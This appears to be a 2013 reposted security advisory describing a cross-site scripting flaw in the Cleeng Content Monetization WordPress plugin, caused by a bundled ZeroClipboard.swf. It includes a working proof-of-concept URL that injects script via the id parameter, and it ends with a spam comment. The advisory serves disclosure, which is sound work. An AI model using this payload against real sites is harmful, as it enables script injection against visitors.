Wordpress Plugins - Cleeng Content Monetization(Cleeng) <== XSS
##################################################
# Description : Wordpress Plugins - Cleeng Content Monetization(Cleeng) <== XSS
# Version : 2.3.2
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################
About:
Cleeng is a unique monetization solution that satisfies both publishers and users interests:
1- If you are musician, blogger, teachers, photographers or software developer, this free plug-in is made for you!
Vulnerabilities in the Cleeng Content Monetization(Cleeng) plugin for WordPress,
which can be exploited by malicious people to conduct cross-site scripting attacks.
The vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.
Cross-Site Scripting vulnerabilities in ZeroClipboard(http://seclists.org/fulldisclosure/2013/Feb/103)
and in multiple web applications.
Affected products:
Vulnerable are all versions
Affected vendors:
Cleeng Content Monetization
http://cleeng.com / http://wordpress.org/plugins/cleeng/
Details:
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into clipboard
POC:
http://site/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height
Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz
You made such an interesting piece to read, giving every subject enlightenment for us to gain knowledge. Thanks for sharing the such information with us to read this... WEBPROTIME
ReplyDelete